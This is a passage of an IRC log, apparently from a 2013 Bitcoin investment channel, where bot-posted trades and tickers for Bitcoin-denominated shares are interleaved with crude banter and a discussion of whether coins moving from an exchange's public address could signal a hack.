detail as "look at the mpex addy on blockchain info" Jul 03 17:31:54 why sorta do it ? Jul 03 17:32:00 mircea_popescu: agreed Jul 03 17:32:17 the mpex addy is public, except there's people who keep insisting they want private addies Jul 03 17:32:23 about the self consistency Jul 03 17:32:29 mircea_popescu: you would grace him with your presence? Jul 03 17:32:43 ericmuyser im here aren't i ? Jul 03 17:35:20 [BTCTC] [TAT.ASICMINER] 24 @ 0.051 = 1.224 BTC [-] Jul 03 17:36:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.051 = 0.408 BTC [-] Jul 03 17:38:11 ;;tslb Jul 03 17:38:13 Time since last block: 11 minutes and 31 seconds Jul 03 17:40:53 ;;tslb Jul 03 17:40:55 Time since last block: 14 minutes and 12 seconds Jul 03 17:41:07 dude aren;'t these thiongs supposed to be 6 per hour. Jul 03 17:41:46 inter-arrival times are exponentially distributed Jul 03 17:42:02 or are you trolling :) Jul 03 17:42:07 [HAVELOCK] [ASICM] 50 @ 0.048852 = 2.4426 BTC [+] Jul 03 17:42:11 talk business to me :( Jul 03 17:42:16 [BTCTC] [ASICMINER-PT] 1 @ 5 BTC [-] Jul 03 17:42:18 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [-] Jul 03 17:42:28 well, i was being sarcastic. in the sense of, "food serving times are exponentially distributed." Jul 03 17:42:40 that means in a 100mn country there's 5 deaths a week from starvation ? Jul 03 17:42:58 food serving events are not independent Jul 03 17:43:15 they are dependent on the paying for them. Jul 03 17:43:46 well that's a different problem entirely Jul 03 17:43:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.051199 = 0.4096 BTC [+] Jul 03 17:44:07 is what i was bitching about. Jul 03 17:44:21 [HAVELOCK] [ASICM] 207 @ 0.048852 = 10.1124 BTC [+] Jul 03 17:44:32 you eat blocks? Jul 03 17:44:35 aha finally. Jul 03 17:44:57 so, davout : point in case. visible mpex addy just lost like 50% Jul 03 17:45:06 [BTCTC] [AMC-PT] 15 @ 0.002415 = 0.0362 BTC [-] Jul 03 17:45:15 should i explain something to you ? what'd i say ? "a large customer withdrew". would you believe me ? if so, why ? Jul 03 17:45:21 [BTCTC] [BASIC-MINING] 10 @ 0.170501 = 1.705 BTC [-] Jul 03 17:45:58 because i wouldn't have deposited wihtout some minimum level of trust in the words that come out of your mouth Jul 03 17:46:07 thing is Jul 03 17:46:24 accounting is not only a way to control stuff for an outside party Jul 03 17:46:36 it's also a way to check stuff internally Jul 03 17:47:03 [HAVELOCK] [ASICM] 30 @ 0.048852 = 1.4656 BTC [+] Jul 03 17:47:30 "we moved some to cold storage", as in Feb 28 20:45:31 also no, http://blockchain.info/tx-index/57331947/df4d038d7734abe9385ae2d8973d8a6d42e3214489d54e6d53e30e3e0ff31076 is not me being stolen from. even if it was relied via moscow. Jul 03 17:48:02 but look, i went from "how horribly wrong" to "what he does is actually fine, i just would have done it slightly differently if i had to do it" Jul 03 17:48:12 hehe Jul 03 17:48:15 AM pay yet? <<<< No, probably another hour ot two from now Jul 03 17:48:16 hehe im not trying to kill you here Jul 03 17:48:20 [HAVELOCK] [VTX] 5 @ 0.51 = 2.55 BTC [+] Jul 03 17:48:29 but they are sold out of USBs, we know that much Jul 03 17:48:34 [HAVELOCK] [HIM] 2 @ 0.319999 = 0.64 BTC [-] Jul 03 17:49:57 well they'd be making more neh ? Jul 03 17:50:45 [HAVELOCK] [ASICM] 1 @ 0.049 BTC [+] Jul 03 17:50:58 [HAVELOCK] [ASICM] 2 @ 0.049 = 0.098 BTC [+] Jul 03 17:51:02 I think .025+ is a safe bet Jul 03 17:51:11 [BTCTC] [DMS.PURCHASE] 4 @ 0.0464 = 0.1856 BTC [-] Jul 03 17:51:24 with the constant possibility of AM withholding divs for invetsment of course Jul 03 17:51:30 [HAVELOCK] [ASICM] 197 @ 0.049 = 9.653 BTC [+] Jul 03 17:51:40 Goat, your only enemy is BTC/USD right now Jul 03 17:51:51 [BTCTC] [ASICMINER-PT] 1 @ 5.000001 BTC [+] Jul 03 17:51:57 ;;ticker Jul 03 17:51:58 MtGox BTCUSD ticker | Best bid: 84.01000, Best ask: 84.64000, Bid-ask spread: 0.63000, Last trade: 84.59898, 24 hour volume: 35002.16438311, 24 hour low: 83.10000, 24 hour high: 91.80000, 24 hour vwap: 87.91887 Jul 03 17:52:13 [HAVELOCK] [ASICM] 2 @ 0.049 = 0.098 BTC [+] Jul 03 17:52:14 [HAVELOCK] [ASICM] 22 @ 0.04885 = 1.0747 BTC [-] Jul 03 17:52:20 [BTCTC] [BASIC-MINING] 2 @ 0.1705 = 0.341 BTC [-] Jul 03 17:52:28 [BTCTC] [BMF] 10 @ 0.038 = 0.38 BTC [+] Jul 03 17:52:31 thats not what i meant Jul 03 17:52:33 [BTCTC] [ASICMINER-PT] 2 @ 5 = 10 BTC [-] Jul 03 17:52:38 who cares of your richness Jul 03 17:52:56 you changed the topic Jul 03 17:53:08 In Russia, topic changes you! Jul 03 17:53:13 lol Jul 03 17:53:29 well we were discussing the success of your auction right? Jul 03 17:53:44 if people panic about BTC/USD Jul 03 17:53:49 they will sell off AM Jul 03 17:53:53 [BTCTC] [BASIC-MINING] 2 @ 0.1701 = 0.3402 BTC [-] Jul 03 17:54:01 making your auction overpriced Jul 03 17:54:16 in other news, things priced in BTC are going on sale today :p Jul 03 17:54:18 [BTCTC] [RSM] 3 @ 0.016006 = 0.048 BTC [+] Jul 03 17:54:21 hehe Jul 03 17:54:44 topace did you get my email yesterday? Jul 03 17:54:46 topace: what your saying is now is the time to get my alpaca socks? Jul 03 17:54:58 ThickAsThieves: yea, ill reply soon, was crazy yesterday Jul 03 17:55:03 you're8 Jul 03 17:55:03 cool cool Jul 03 17:55:18 monday was holiday up here, so tuesday back after a long weekend = crazy Jul 03 17:55:22 [BTCTC] [RSM] 3 @ 0.016005 = 0.048 BTC [-] Jul 03 17:55:47 Question for you guys, is there any set time when divz are given out? Jul 03 17:56:09 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Jul 03 17:56:18 [BTCTC] [BASIC-MINING] 2 @ 0.17 = 0.34 BTC [-] Jul 03 17:56:20 [BTCTC] [BASIC-MINING] 8 @ 0.17 = 1.36 BTC [-] Jul 03 17:57:27 Chaang-Noi: no time like 15:00? Just a day? Fair enough :) Jul 03 17:57:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.051199 = 0.512 BTC [+] Jul 03 17:57:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0512 = 0.512 BTC [+] Jul 03 17:57:35 [BTCTC] [TAT.ASICMINER] 17 @ 0.051399 = 0.8738 BTC [+] Jul 03 17:57:37 [BTCTC] [TAT.ASICMINER] 30 @ 0.0514 = 1.542 BTC [+] Jul 03 17:57:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.051499 BTC [+] Jul 03 17:57:40 gogogogo Jul 03 17:57:40 [BTCTC] [TAT.ASICMINER] 22 @ 0.051499 = 1.133 BTC [+] Jul 03 17:58:02 TAT shares are going crazy! ;) Jul 03 17:58:19 Going to invest once I get my btc out of coinlenders which really is such an awful scheme. Jul 03 17:58:25 is AM really at 5.0? Jul 03 17:58:29 yessir Jul 03 17:58:39 this is not a dream Jul 03 17:58:45 but still could be a nightmare Jul 03 17:59:02 or the Matrix Jul 03 17:59:05 so hard to tell Jul 03 17:59:19 TAT > PT at the moment, congrats! Jul 03 17:59:25 mp says i'm a brain in a jar and he is fucking me sometimes Jul 03 17:59:33 but i dont feel a thing so whatevs Jul 03 18:00:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.051499 = 0.309 BTC [+] Jul 03 18:00:28 [BTCTC] [BASIC-MINING] 2 @ 0.17 = 0.34 BTC [-] Jul 03 18:00:33 BRB Jul 03 18:00:53 [BTCTC] [BASIC-MINING] 10 @ 0.166201 = 1.662 BTC [-] Jul 03 18:01:04 ;;bc,stats Jul 03 18:01:07 Current Blocks: 244584 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1367 blocks | Next Difficulty In About: 1 week, 0 days, 20 hours, 33 minutes, and 6 seconds | Next Difficulty Estimate: 23907779.0463 | Estimated Percent Change: 12.05723 Jul 03 18:01:27 [BTCTC] [S.DICE-PT] 20 @ 0.002348 = 0.047 BTC [+] Jul 03 18:01:28 this is insane though Jul 03 18:01:34 they are selling erupters for 1 BTC? Jul 03 18:01:42 sold out actually Jul 03 18:01:43 that will never pay itself off Jul 03 18:01:48 i've seen .56 and .84 go through. Jul 03 18:02:18 not that it matters, still won't pay Jul 03 18:02:19 !ticker h asicm Jul 03 18:02:22 [HAVELOCK:ASICM] 1D: 0.04471200 / 0.04740635 / 0.04959000 (21083 shares, 999.46803558 BTC), 7D: 0.03100000 / 0.04083596 / 0.04959000 (79553 shares, 3248.62304092 BTC), 30D: 0.02310000 / 0.03133744 / 0.04959000 (276811 shares, 8674.54804078 BTC) Jul 03 18:02:32 you're looking at 4 months Jul 03 18:02:35 that's a third of a year Jul 03 18:02:52 why does everyone insist they USBs must pay for themselves? Jul 03 18:02:56 they are fucking toys Jul 03 18:03:07 do toys pay for themselves? Jul 03 18:03:09 oh, we know. but many people delude themselves Jul 03 18:03:13 XD Jul 03 18:03:18 Expensive ass toys Jul 03 18:03:29 we pay $600 for phones now Jul 03 18:03:38 and if you look at the btcguild sellings, they really sell it as something better than a gpu, that will pay itself off Jul 03 18:03:40 I think $90 toys arent that big a deal Jul 03 18:03:41 Who the fuck pays 600 for a phone... Jul 03 18:04:00 iphone and galaxy users unless its on contract Jul 03 18:04:11 contract is like $250 when new Jul 03 18:04:16 particularly when you consider that mining with them will ptobably pay back half the cost Jul 03 18:04:35 so $40 toys Jul 03 18:05:17 girlfriend took me shopping. bought the $100 jeans she suggested not to hurt her feelings. would have rather had an AM usb. cried in closet. Jul 03 18:05:18 that's like what 2 Spawn Figurines? Jul 03 18:05:19 Da fuck Jul 03 18:05:34 that's the first Spawn Figurine Jul 03 18:05:40 reference Jul 03 18:05:45 I"ve heard since like 1995 Jul 03 18:05:49 ahahahahahaha Jul 03 18:05:58 they still mak that shit? Jul 03 18:05:59 well how often do you think i keep up with toys? Jul 03 18:06:19 I thought God and the forces of Hell destroyed earth and the whole thing ended... Jul 03 18:06:44 i bet Todd McFarlane is still milking that cow somehow Jul 03 18:07:18 yep Jul 03 18:07:23 he makes Walking Dead toys Jul 03 18:07:25 so there Jul 03 18:07:28 suck it Jul 03 18:07:34 i feel like I should be taking lithium and listening to nirvana at this moment Jul 03 18:07:56 ;;ticker Jul 03 18:07:57 MtGox BTCUSD ticker | Best bid: 85.07000, Best ask: 85.59999, Bid-ask spread: 0.52999, Last trade: 85.60000, 24 hour volume: 36584.22995984, 24 hour low: 83.10000, 24 hour high: 91.80000, 24 hour vwap: 87.80772 Jul 03 18:08:15 nirvana? spice girls. Jul 03 18:08:26 the 90's live in #bitcoin-assets Jul 03 18:08:36 Propagandhi Jul 03 18:08:51 ... Jul 03 18:08:53 Strung Out Jul 03 18:08:55 etc Jul 03 18:08:59 @_@ Jul 03 18:09:07 I don't feel quite so old these days Jul 03 18:09:26 while mircea_popescu pushes 80 over there in romania Jul 03 18:09:30 lol Jul 03 18:10:37 [MPEX] [S.MPOE] 6400 @ 0.0007725 = 4.944 BTC [-] Jul 03 18:11:16 [BTCTC] [AMC-PT] 200 @ 0.0024 = 0.48 BTC [-] Jul 03 18:11:19 [BTCTC] [AMC-PT] 1800 @ 0.0024 = 4.32 BTC [-] Jul 03 18:11:21 when did MPOE plummed back into the 7's? Jul 03 18:14:10 Whats with all these coins man..will they ever stop being fabricated https://copperlark.com/en Jul 03 18:14:11 [HAVELOCK] [ASICM] 150 @ 0.049 = 7.35 BTC [+] Jul 03 18:14:13 [BTCTC] [ASICMINER-PT] 4 @ 5.017999 = 20.072 BTC [+] Jul 03 18:14:15 [BTCTC] [ASICMINER-PT] 4 @ 5.018 = 20.072 BTC [+] Jul 03 18:14:40 why does everyone insist they USBs must pay for themselves? they are fucking toys << this Jul 03 18:14:43 rectum fitting. Jul 03 18:14:55 Expensive ass toys << exactly. Jul 03 18:15:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.05 = 0.25 BTC [-] Jul 03 18:15:35 girlfriend took me shopping. bought the $100 jeans she suggested not to hurt her feelings. would have rather had an AM usb. cried in closet. <<< congratulations, you are now a girl. Jul 03 18:15:50 HAH Jul 03 18:15:58 mircea_popescu: do i get boobs tho? Jul 03 18:16:18 [BTCTC] [DMS.MINING] 1 @ 0.019203 BTC [+] Jul 03 18:16:24 nope. you get to be one of those boobless chicks Jul 03 18:16:27 sucks huh. Jul 03 18:16:31 fuck my life Jul 03 18:16:31 lol Jul 03 18:16:40 well, talk to am maybe they make the hashtit. Jul 03 18:16:46 to go with the hashanalprobe Jul 03 18:16:50 [BTCTC] [DMS.PURCHASE] 1 @ 0.049338 BTC [+] Jul 03 18:17:20 [BTCTC] [AMC-PT] 1000 @ 0.0024 = 2.4 BTC [-] Jul 03 18:17:40 ericmuyser: dump her, prostitutes are cheaper Jul 03 18:18:35 [BTCTC] [AMC-PT] 525 @ 0.002415 = 1.2679 BTC [+] Jul 03 18:18:50 i doubt it, she prolly charges some other dude 100 to take the same jeans off Jul 03 18:19:15 [BTCTC] [AMC-PT] 5 @ 0.002415 = 0.0121 BTC [+] Jul 03 18:19:18 [BTCTC] [TAT.ASICMINER] 17 @ 0.05 = 0.85 BTC [-] Jul 03 18:19:35 [BTCTC] [BTC-TRADING-PT] 18 @ 0.9048 = 16.2864 BTC [-] Jul 03 18:20:03 [BTCTC] [BASIC-MINING] 10 @ 0.166201 = 1.662 BTC [-] Jul 03 18:20:27 [BTCTC] [BASIC-MINING] 4 @ 0.166201 = 0.6648 BTC [-] Jul 03 18:20:29 [BTCTC] [BASIC-MINING] 1 @ 0.18 BTC [+] Jul 03 18:20:59 [BTCTC] [DMS.SELLING] 10 @ 0.031 = 0.31 BTC [-] Jul 03 18:22:32 I apologize in advance: http://www.draknek.org/games/BRICKbricksmashSMASH/ Jul 03 18:22:34 [BTCTC] [TAT.ASICMINER] 50 @ 0.050001 = 2.5001 BTC [+] Jul 03 18:22:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.05 = 2.5 BTC [-] Jul 03 18:23:02 [BTCTC] [BASIC-MINING] 4 @ 0.1662 = 0.6648 BTC [-] Jul 03 18:23:04 [BTCTC] [BASIC-MINING] 3 @ 0.1661 = 0.4983 BTC [-] Jul 03 18:23:06 [BTCTC] [BASIC-MINING] 3 @ 0.1661 = 0.4983 BTC [-] Jul 03 18:23:34 [BTCTC] [BITVPS] 6 @ 0.00299 = 0.0179 BTC [-] Jul 03 18:24:11 [BTCTC] [AMC-PT] 455 @ 0.002415 = 1.0988 BTC [+] Jul 03 18:25:04 [BTCTC] [TAT.ASICMINER] 25 @ 0.0511 = 1.2775 BTC [+] Jul 03 18:26:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.0512 = 0.3584 BTC [+] Jul 03 18:26:19 ericmuyser you have now successfully created a crisis in my offices. please clarify : did the gf suggest you buy HER a pair of jeans or buy YOURSELF a pair of jeans Jul 03 18:26:29 [BTCTC] [ASICMINER-PT] 4 @ 4.950008 = 19.8 BTC [-] Jul 03 18:26:36 [BTCTC] [ASICMINER-PT] 1 @ 4.950001 BTC [-] Jul 03 18:26:39 [BTCTC] [ASICMINER-PT] 2 @ 4.95 = 9.9 BTC [-] Jul 03 18:28:12 that's the beauty of poetry Jul 03 18:28:29 i'm going to end up with a female rebellion Jul 03 18:28:44 all on account of one irc user's irresponsible comments as to jeans Jul 03 18:29:01 heh just-dice.com down ? Jul 03 18:29:10 if women wore skirts like god intended this wouldn't even be an issue in the first place. Jul 03 18:29:11 zomg dooglus ran with 13500 BTC investments! Jul 03 18:29:20 topace it was down before Jul 03 18:30:03 doog took the money to panama to work for sdice obv Jul 03 18:30:19 ThickAsThieves: http://gyazo.com/d8708ab3f59acffd9f558c8d8ecd8dae Jul 03 18:30:38 poor Jul 03 18:31:17 [BTCTC] [ASICMINER-PT] 1 @ 5.014994 BTC [+] Jul 03 18:31:33 http://www.reddit.com/r/Bitcoin/comments/1hkgwn/dimming_down_the_hype_of_the_speculators Jul 03 18:31:37 check out how much reddit loves me. Jul 03 18:31:38 Dimming down the hype of the speculators. : Bitcoin Jul 03 18:31:54 Reddit does not love you that much :( Jul 03 18:31:58 way to miss what's going on around you reddit. Jul 03 18:32:00 Bad response that I had to take it down Jul 03 18:32:39 matthew_boyd well, what reddit likes or doesn't like is quite immaterial. the point is to allign reddit to sense not the other way around. Jul 03 18:32:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.051199 = 2.56 BTC [-] Jul 03 18:32:44 oh you're a "racist" Jul 03 18:32:59 yeah. and i dare call the self-styled "devs" self-styled and put it in quotes Jul 03 18:33:02 which is quite scandalous!!11 Jul 03 18:33:27 mircea_popescu: aye! all thiough I have a better neich for you, so it's all good! /r/Bitcoin didn't show you much love, doesn't mean Reddit doesn't ;) Jul 03 18:33:29 matt, try 1:35 36:score Jul 03 18:33:31 though* Jul 03 18:33:43 Hahaha ThickAsThieves, way too much time on your hands! Jul 03 18:33:49 matthew_boyd seriously, it's about their education. Jul 03 18:33:59 3rd try actually Jul 03 18:34:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.0512 = 0.3584 BTC [+] Jul 03 18:34:34 it dun matter if they earnestly believe the universe rotates around the moon. and it doesn;'t matter whether they like the sun or not, Jul 03 18:34:37 game has a weakness Jul 03 18:34:49 [BTCTC] [BITVPS] 3 @ 0.0029 = 0.0087 BTC [-] Jul 03 18:34:53 or they think it's fairer that earth be in the center of teh universe. Jul 03 18:35:34 now, arguably, getting a bunch of internet retards to submit to objective reality when they have an entire field of self-spawned fiction to bathe in might be pretty hard. Jul 03 18:35:37 funny how people cry when they hear what they dont want to hear Jul 03 18:35:55 but the girl is doing a sort-of ok job on the forum, and you can do an ok job on reddit too, if you apply yourself. Jul 03 18:35:58 or so i think. Jul 03 18:36:22 Oh, so you got 32D to post on Reddit? Jul 03 18:36:23 er or read for that matter Jul 03 18:36:38 matthew_boyd the girl = mpoe-pr. Jul 03 18:36:48 [BTCTC] [ASICMINER-PT] 5 @ 4.95 = 24.75 BTC [-] Jul 03 18:36:49 KRS1- totally. Jul 03 18:37:13 mircea_popescu: good choice, haha ;) Jul 03 18:37:19 Need contact to fawksey? Jul 03 18:37:24 [BTCTC] [TAT.ASICMINER] 19 @ 0.0512 = 0.9728 BTC [+] Jul 03 18:37:50 ;;gettrust Girlfawkesy Jul 03 18:37:51 Trust relationship from user mircea_popescu to user Girlfawkesy: Level 1: 1, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=Girlfawkesy Jul 03 18:38:24 [BTCTC] [TAT.ASICMINER] 32 @ 0.0512 = 1.6384 BTC [+] Jul 03 18:38:47 [BTCTC] [ASICMINER-PT] 1 @ 5.014987 BTC [+] Jul 03 18:39:02 [BTCTC] [ASICMINER-PT] 1 @ 4.950001 BTC [-] Jul 03 18:39:37 [BTCTC] [AMC-PT] 10 @ 0.00242 = 0.0242 BTC [+] Jul 03 18:39:45 Anyone want to guess what divz will be for PT? Jul 03 18:39:56 .018 Jul 03 18:40:04 Really? Jul 03 18:40:22 [HAVELOCK] [ASICM] 63 @ 0.04886 = 3.0782 BTC [-] Jul 03 18:40:23 I would have thought more around 0.02 - 0.022 Jul 03 18:40:39 im just throwing numbers. Jul 03 18:40:47 [BTCTC] [ASICMINER-PT] 1 @ 4.95 BTC [-] Jul 03 18:41:04 At age 16, Williams won third prize (five dollars) for an essay published in Smart Set entitled, "Can a Good Wife Be a Good Sport?" Jul 03 18:41:29 The book consisted of one word: "No." Jul 03 18:41:38 [BTCTC] [DMS.SELLING] 20 @ 0.029501 = 0.59 BTC [-] Jul 03 18:41:52 [BTCTC] [ASICMINER-PT] 2 @ 4.975 = 9.95 BTC [+] Jul 03 18:42:00 [BTCTC] [DMS.SELLING] 50 @ 0.0295 = 1.475 BTC [-] Jul 03 18:42:12 dja know what a good sport means in that context ? Jul 03 18:42:41 Makes a sandwich on demand? Jul 03 18:43:04 [BTCTC] [S.DICE-PT] 1 @ 0.002348 BTC [+] Jul 03 18:43:23 nah. does things considered sexually adventurous by her peers. Jul 03 18:43:25 [BTCTC] [ASICMINER-PT] 4 @ 5.014985 = 20.0599 BTC [+] Jul 03 18:43:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.051199 BTC [-] Jul 03 18:43:46 [BTCTC] [BASIC-MINING] 3 @ 0.175999 = 0.528 BTC [+] Jul 03 18:44:05 well, that is, different I suppose.. Jul 03 18:44:10 [BTCTC] [ASICMINER-PT] 2 @ 5.014984 = 10.03 BTC [-] Jul 03 18:44:13 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.004013 = 0.0843 BTC [-] Jul 03 18:44:16 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.004012 = 0.0321 BTC [-] Jul 03 18:44:17 obligatory monty python http://www.youtube.com/watch?v=ona-RhLfRfc Jul 03 18:44:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00401 = 0.008 BTC [-] Jul 03 18:44:21 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00401 = 0.0241 BTC [-] Jul 03 18:44:24 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.004 = 0.084 BTC [-] Jul 03 18:44:26 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.004 = 4 BTC [-] Jul 03 18:44:37 Got to love a good Monty Python! Jul 03 18:45:03 Have you ever heard of "Mind your language" Jul 03 18:45:06 yes. Jul 03 18:45:13 Really? :O Jul 03 18:45:15 It's great! Jul 03 18:45:33 [BTCTC] [S.MPOE-PT] 2 @ 0.000992 = 0.002 BTC [+] Jul 03 18:46:19 [BTCTC] [RSM] 30 @ 0.016006 = 0.4802 BTC [+] Jul 03 18:46:48 [BTCTC] [DMS.MINING] 12 @ 0.020497 = 0.246 BTC [+] Jul 03 18:46:48 [BTCTC] [DMS.MINING] 11 @ 0.020497 = 0.2255 BTC [+] Jul 03 18:46:50 yes, some of us were alive in the 70s you know :D Jul 03 18:46:51 [BTCTC] [DMS.MINING] 24 @ 0.020497 = 0.4919 BTC [+] Jul 03 18:46:56 [BTCTC] [DMS.MINING] 35 @ 0.020498 = 0.7174 BTC [+] Jul 03 18:46:57 [BTCTC] [DMS.MINING] 51 @ 0.0205 = 1.0455 BTC [+] Jul 03 18:46:58 Haha, I was not \o/ Jul 03 18:47:23 so, any thoughts on why the BTCT MPOE is trading so much higher than MEPx? Jul 03 18:47:28 The spanish guy is the best! If someone corrects his grammar he just says; "Sorry wrong number" Jul 03 18:48:22 !t btct mpoe Jul 03 18:48:25 I haven't understood a single word you've said since I met you, not one single word. Jul 03 18:48:29 !t btct mpoe-pt Jul 03 18:48:31 Yeah. No damn tobacco, that's for sure. Jul 03 18:48:35 da fuck its called Jul 03 18:48:53 [BTCTC] [AMC-PT] 463 @ 0.00216 = 1.0001 BTC [-] Jul 03 18:48:55 [BTCTC] [AMC-PT] 100 @ 0.002101 = 0.2101 BTC [-] Jul 03 18:48:56 [BTCTC] [AMC-PT] 300 @ 0.0021 = 0.63 BTC [-] Jul 03 18:48:58 [BTCTC] [AMC-PT] 4 @ 0.0021 = 0.0084 BTC [-] Jul 03 18:48:58 !s.mpoe-pt Jul 03 18:48:59 [BTCTC] [AMC-PT] 70 @ 0.002 = 0.14 BTC [-] Jul 03 18:49:00 [BTCTC] [AMC-PT] 50 @ 0.002 = 0.1 BTC [-] Jul 03 18:49:10 !t b s.mpoe-pt Jul 03 18:49:12 You know, I've had it up to here with this Indian malarkey. Jul 03 18:49:18 !t btct s.mpoe-pt Jul 03 18:49:21 [BTCT:S.MPOE-PT] 1D: 0.000863 / 0.001 / 0.001 (539 shares, 0.5 BTC), 7D: 0.0008 / 0.00098 / 0.00114 (4215 shares, 4.1 BTC), 30D: 0.000635 / 0.00076 / 0.00115 (35942 shares, 27.3 BTC) Jul 03 18:50:33 generally the mpoe PTs trade at their own rates because of low volume Jul 03 18:51:09 i've seen them 25% lower at times Jul 03 18:51:25 wow it touched 1 ?! Jul 03 18:51:37 !t m s.mpoe Jul 03 18:51:39 [MPEX:S.MPOE] 1D: 0.0007725 / 0.00078064 / 0.00083551 (681586 shares, 532.08 BTC), 7D: 0.0007725 / 0.00081546 / 0.00083673 (2921603 shares, 2,382.47 BTC), 30D: 0.0006575 / 0.00076979 / 0.00083673 (60204398 shares, 46,345.29 BTC) Jul 03 18:51:56 looks like ~500 btc worth of selloff today. Jul 03 18:52:26 mpoe is on sale Jul 03 18:53:32 [MPEX] [S.MPOE] 1000 @ 0.00077583 = 0.7758 BTC [+] Jul 03 18:54:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0511 BTC [-] Jul 03 18:55:10 [BTCTC] [S.DICE-PT] 13 @ 0.002347 = 0.0305 BTC [-] Jul 03 18:57:06 mircea_popescu: yo. I found the answer to "how do you know the 15k moving from mpex's public addy is me and not a hack" Jul 03 18:57:18 it's actually pretty simple Jul 03 18:57:37 go on Jul 03 18:57:53 "no hacker takes 15k on an address that has 25k original balance" Jul 03 18:58:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.0511 = 0.2555 BTC [-] Jul 03 18:58:34 anyway, just felt a little stupid when i caught the answer randomly walking around in my brain Jul 03 18:58:45 davout: or you could sign something with the destination address? Jul 03 18:58:55 the reasoning is kinda faulty. Jul 03 18:58:57 [BTCTC] [ASICMINER-PT] 3 @ 4.930001 = 14.79 BTC [-] Jul 03 18:59:01 peterl: unless you don't own it which is the case here Jul 03 18:59:02 [BTCTC] [ASICMINER-PT] 3 @ 4.93 = 14.79 BTC [-] Jul 03 18:59:09 [BTCTC] [ASICMINER-PT] 1 @ 4.927012 BTC [-] Jul 03 18:59:13 as if it becomes part of the process then indeed the hacker has an incentive to do exactly that. Jul 03 18:59:14 [BTCTC] [ASICMINER-PT] 1 @ 4.927008 BTC [-] Jul 03 18:59:17 [BTCTC] [ASICMINER-PT] 1 @ 4.927 BTC [-] Jul 03 18:59:22 [BTCTC] [ASICMINER-PT] 1 @ 4.890001 BTC [-] Jul 03 18:59:24 [BTCTC] [ASICMINER-PT] 2 @ 4.89 = 9.78 BTC [-] Jul 03 18:59:31 [BTCTC] [ASICMINER-PT] 1 @ 4.881 BTC [-] Jul 03 18:59:34 [BTCTC] [ASICMINER-PT] 5 @ 4.871005 = 24.355 BTC [-] Jul 03 18:59:36 [BTCTC] [ASICMINER-PT] 30 @ 4.871004 = 146.1301 BTC [-] Jul 03 18:59:38 [BTCTC] [ASICMINER-PT] 28 @ 4.871001 = 136.388 BTC [-] Jul 03 18:59:39 whoever owns it could sign a staement that he is being paid, and MP could sign that? Jul 03 18:59:40 well, if the hacker is not the management he has zero incentive to do that Jul 03 18:59:55 davout not exactly true. Jul 03 19:00:16 what'd you take, 100% and be branded a thief or 60% and have someone else take the blame ? Jul 03 19:00:31 and, if the hacker is the management he has an incentive to make it look like he isn't Jul 03 19:00:42 peterl except in all cases where whoever's being paid doesn't think it's anyone's business. Jul 03 19:00:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.0505 = 2.525 BTC [-] Jul 03 19:00:48 so if an address is half-emptied, and half an hour later is still half full you can assume it's not a hack Jul 03 19:00:54 [BTCTC] [TAT.ASICMINER] 24 @ 0.050002 = 1.2 BTC [-] Jul 03 19:00:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.050001 = 2.5001 BTC [-] Jul 03 19:00:58 [BTCTC] [TAT.ASICMINER] 13 @ 0.05 = 0.65 BTC [-] Jul 03 19:01:05 right, good point Jul 03 19:01:07 davout again, if "half hour" becomes part of hte process there'sd incentive on both sides. Jul 03 19:01:17 "what'd you take, 100% and be branded a thief or 60% and have someone else take the blame ?" <-- how do you reach this dichotomy ? Jul 03 19:01:37 by following your concept. if i as a thief have the choice of either taking the whole balance and you saying i stole it Jul 03 19:01:43 or taking most ofg the balance and you saying mpex stolen Jul 03 19:01:49 then i might as well take the 2nd route. Jul 03 19:02:34 why, as a thief, would i care about who is being accused if i can do it with reasonable assurance of not being caught ? because if i suspect i might get caught i might as well go all the way and steal the whole thing Jul 03 19:02:52 no ? Jul 03 19:02:57 you could sign something with the sending address ... wait, but if a hacker gains control that is what they do to send the bitcoin. Jul 03 19:03:00 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 03 19:03:09 peterl: lol :-) Jul 03 19:03:19 anyway, was just a thought Jul 03 19:04:44 [BTCTC] [ASICMINER-PT] 1 @ 4.891001 BTC [+] Jul 03 19:04:47 [BTCTC] [ASICMINER-PT] 1 @ 4.891 BTC [-] Jul 03 19:05:49 [BTCTC] [BITVPS] 9 @ 0.00299 = 0.0269 BTC [+] Jul 03 19:06:26 davout how would i know what a thief cares about ? Jul 03 19:06:42 mircea_popescu you're an acrobat :-) Jul 03 19:06:53 lmao Jul 03 19:09:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.050899 = 0.1527 BTC [+] Jul 03 19:10:23 [BTCTC] [AMC-PT] 5 @ 0.002324 = 0.0116 BTC [+] Jul 03 19:11:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.050899 = 0.2036 BTC [+] Jul 03 19:17:19 [BTCTC] [TAT.ASICMINER] 42 @ 0.04915 = 2.0643 BTC [-] Jul 03 19:20:15 [BTCTC] [TAT.ASICMINER] 43 @ 0.050899 = 2.1887 BTC [+] Jul 03 19:27:18 [BTCTC] [RSM] 90 @ 0.016005 = 1.4405 BTC [-] Jul 03 19:27:50 ;;next Jul 03 19:27:51 Error: Couldn't 